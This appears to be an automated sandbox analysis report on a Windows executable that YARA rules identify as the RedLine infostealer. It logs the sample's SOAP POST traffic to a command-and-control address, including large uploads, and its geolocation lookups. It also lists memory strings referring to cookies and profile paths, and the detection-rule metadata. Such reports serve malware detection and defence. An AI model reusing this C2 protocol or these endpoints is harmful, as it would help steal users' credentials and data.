Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49740

Source: global traffic

TCP traffic: 192.168.2.4:49734 -> 45.137.22.227:55615

Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.227:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.227:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.227:55615Content-Length: 953613Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.227:55615Content-Length: 953605Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 104.26.13.31 104.26.13.31

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown

HTTPS traffic detected: 104.26.13.31:443 -> 192.168.2.4:49737 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.227

Source: global traffic

HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.227:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002B57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.227:5
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp, qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.227:55615
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.227:55615/
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.227:55615t-
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002970000.00000004.00000800.00020000.00000000.sdmp, qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp, qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002999000.00000004.00000800.00020000.00000000.sdmp, qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002970000.00000004.00000800.00020000.00000000.sdmp, qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002B57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002B57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp, qJ64p5G1XJ.exe, 00000000.00000002.1742529895.0000000005274000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: qJ64p5G1XJ.exe, qJ64p5G1XJ.exe, 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: qJ64p5G1XJ.exe, qJ64p5G1XJ.exe, 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: qJ64p5G1XJ.exe, qJ64p5G1XJ.exe, 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.qJ64p5G1XJ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 4.2.qJ64p5G1XJ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 4.2.qJ64p5G1XJ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.qJ64p5G1XJ.exe.37d4128.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.qJ64p5G1XJ.exe.37d4128.2.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.qJ64p5G1XJ.exe.37d4128.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.qJ64p5G1XJ.exe.426b178.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.qJ64p5G1XJ.exe.426b178.1.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.qJ64p5G1XJ.exe.426b178.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.qJ64p5G1XJ.exe.426b178.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.qJ64p5G1XJ.exe.426b178.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.qJ64p5G1XJ.exe.426b178.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1735815535.000000000426B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: qJ64p5G1XJ.exe PID: 6900, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: qJ64p5G1XJ.exe PID: 2196, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 0_2_069B5E00	0_2_069B5E00
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 0_2_069B1570	0_2_069B1570
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 0_2_00E6DC8C	0_2_00E6DC8C
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 0_2_04DEE5F8	0_2_04DEE5F8
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 0_2_04DEE5E8	0_2_04DEE5E8
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_00FAE7B0	4_2_00FAE7B0
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_00FADC90	4_2_00FADC90
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_06279628	4_2_06279628
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_06274468	4_2_06274468
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_06271210	4_2_06271210
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_06273311	4_2_06273311
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_0627DD00	4_2_0627DD00
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_0627CD12	4_2_0627CD12
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_0627D108	4_2_0627D108
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_06C9D7A0	4_2_06C9D7A0
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_06C9F0A0	4_2_06C9F0A0
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_06C905C8	4_2_06C905C8
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_06C94588	4_2_06C94588
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_06C905BA	4_2_06C905BA
Source: C:\Users\user\Desktop\qJ64p5G1XJ.exe	Code function: 4_2_06C94579	4_2_06C94579

Source: qJ64p5G1XJ.exe	Binary or memory string: OriginalFilename vs qJ64p5G1XJ.exe
Source: qJ64p5G1XJ.exe, 00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs qJ64p5G1XJ.exe
Source: qJ64p5G1XJ.exe, 00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs qJ64p5G1XJ.exe
Source: qJ64p5G1XJ.exe, 00000000.00000002.1735427065.0000000002992000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs qJ64p5G1XJ.exe
Source: qJ64p5G1XJ.exe, 00000000.00000002.1735815535.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs qJ64p5G1XJ.exe
Source: qJ64p5G1XJ.exe, 00000000.00000002.1735815535.0000000003FF3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs qJ64p5G1XJ.exe
Source: qJ64p5G1XJ.exe, 00000000.00000002.1742618975.0000000006990000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs qJ64p5G1XJ.exe
Source: qJ64p5G1XJ.exe, 00000000.00000000.1678259906.00000000003D0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamexVmy.exe4 vs qJ64p5G1XJ.exe
Source: qJ64p5G1XJ.exe, 00000000.00000002.1744159853.000000000AE10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs qJ64p5G1XJ.exe
Source: qJ64p5G1XJ.exe, 00000000.00000002.1734988205.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs qJ64p5G1XJ.exe
Source: qJ64p5G1XJ.exe, 00000004.00000002.1859681997.00000000029B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs qJ64p5G1XJ.exe
Source: qJ64p5G1XJ.exe, 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs qJ64p5G1XJ.exe
Source: qJ64p5G1XJ.exe, 00000004.00000002.1858487637.0000000000C98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs qJ64p5G1XJ.exe
Source: qJ64p5G1XJ.exe	Binary or memory string: OriginalFilenamexVmy.exe4 vs qJ64p5G1XJ.exe

Source: qJ64p5G1XJ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.qJ64p5G1XJ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 4.2.qJ64p5G1XJ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 4.2.qJ64p5G1XJ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
